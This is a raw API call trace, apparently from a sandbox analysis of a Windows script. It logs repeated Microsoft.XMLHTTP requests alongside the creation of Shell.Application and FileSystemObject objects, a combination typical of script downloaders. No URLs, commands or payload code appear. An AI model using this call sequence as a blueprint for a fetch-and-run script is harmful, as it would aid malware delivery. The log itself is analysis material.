	[0441.448] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5aa0) returned 0x0
	[0441.448] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0441.448] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5c08) returned 0x0
	[0441.448] ??2@YAPEAX_K@Z () returned 0x62f310
	[0441.448] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5c08, pUnkSite=0x62f310) 
	[0441.448] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0441.448] XMLHTTPRequest:IUnknown:Release (This=0x49c5c08) returned 0x0
	[0441.448] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5aa0) returned 0x0
	[0441.448] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5aa0) returned 0x3
	[0441.448] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0441.448] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0441.448] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0441.448] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0441.448] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Send", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=5) returned 0x0
	[0441.448] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0441.932] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd48 | out: ppvObject=0x28dd48*=0x0) returned 0x80004002
	[0441.932] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28de60*="responseText", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc9c | out: rgDispId=0x28dc9c*=10) returned 0x0
	[0441.932] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0441.932] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0441.933] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0441.933] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0441.933] CLSIDFromProgIDEx (in: lpszProgID="Shell.Application", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0))) returned 0x0
	[0441.933] SysStringLen (param_1=0x0) returned 0x0
	[0441.933] CoGetClassObject (in: rclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x7fefe928d20) returned 0x0
	[0441.933] Shell:IUnknown:QueryInterface (in: This=0x7fefe928d20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0441.933] Shell:IClassFactory:CreateInstance (in: This=0x7fefe928d20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x3967c0) returned 0x0
	[0441.933] Shell:IUnknown:Release (This=0x7fefe928d20) returned 0x1
	[0441.933] Shell:IUnknown:QueryInterface (in: This=0x3967c0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x396800) returned 0x0
	[0441.933] ??2@YAPEAX_K@Z () returned 0x62f350
	[0441.933] Shell:IObjectWithSite:SetSite (This=0x396800, pUnkSite=0x62f350) returned 0x0
	[0441.933] XMLHTTPRequest:IUnknown:AddRef (This=0x62f350) returned 0x2
	[0441.933] Shell:IUnknown:Release (This=0x396800) returned 0x1
	[0441.933] Shell:IUnknown:QueryInterface (in: This=0x3967c0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x3967c0) returned 0x0
	[0441.933] Shell:IUnknown:AddRef (This=0x3967c0) returned 0x3
	[0441.934] CLSIDFromProgIDEx (in: lpszProgID="Scripting.FileSystemObject", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28))) returned 0x0
	[0441.934] SysStringLen (param_1=0x0) returned 0x0
	[0441.934] CoGetClassObject (in: rclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x45f030) returned 0x0
	[0442.032] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0442.032] FileSystemObject:IClassFactory:CreateInstance (in: This=0x45f030, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x45f000) returned 0x0
	[0442.032] FileSystemObject:IUnknown:Release (This=0x45f030) returned 0x0
	[0442.032] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x0) returned 0x80004002
	[0442.032] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x45f000) returned 0x0
	[0442.032] FileSystemObject:IUnknown:AddRef (This=0x45f000) returned 0x3
	[0443.252] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0443.252] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0443.252] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0443.253] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0443.253] SysStringLen (param_1=0x0) returned 0x0
	[0443.253] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0443.254] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0443.254] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5aa0) returned 0x0
	[0443.254] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0443.254] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7878) returned 0x0
	[0443.254] ??2@YAPEAX_K@Z () returned 0x62f310
	[0443.254] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7878, pUnkSite=0x62f310) 
	[0443.254] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0443.254] XMLHTTPRequest:IUnknown:Release (This=0x49c7878) returned 0x0
	[0443.254] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5aa0) returned 0x0
	[0443.254] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5aa0) returned 0x3
	[0443.254] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0443.254] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0443.257] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0443.257] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0443.257] SysStringLen (param_1=0x0) returned 0x0
	[0443.257] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0443.257] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0443.257] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5b50) returned 0x0
	[0443.257] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0443.257] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5bb8) returned 0x0
	[0443.257] ??2@YAPEAX_K@Z () returned 0x62f330
	[0443.257] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5bb8, pUnkSite=0x62f330) 
	[0443.258] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0443.258] XMLHTTPRequest:IUnknown:Release (This=0x49c5bb8) returned 0x0
	[0443.258] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5b50) returned 0x0
	[0443.258] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5b50) returned 0x3
	[0443.258] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0443.258] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5b50, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0443.258] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0443.258] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0443.258] SysStringLen (param_1=0x0) returned 0x0
	[0443.258] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0443.258] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0443.258] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c74d0) returned 0x0
	[0443.258] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0443.258] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74d0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5c58) returned 0x0
	[0443.259] ??2@YAPEAX_K@Z () returned 0x62f310
	[0443.259] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5c58, pUnkSite=0x62f310) 
	[0443.259] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0443.259] XMLHTTPRequest:IUnknown:Release (This=0x49c5c58) returned 0x0
	[0443.259] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74d0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c74d0) returned 0x0
	[0443.259] XMLHTTPRequest:IUnknown:AddRef (This=0x49c74d0) returned 0x3
	[0443.259] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74d0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0443.259] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74d0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0443.259] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74d0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0443.259] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0443.259] SysStringLen (param_1=0x0) returned 0x0
	[0443.259] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0443.259] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
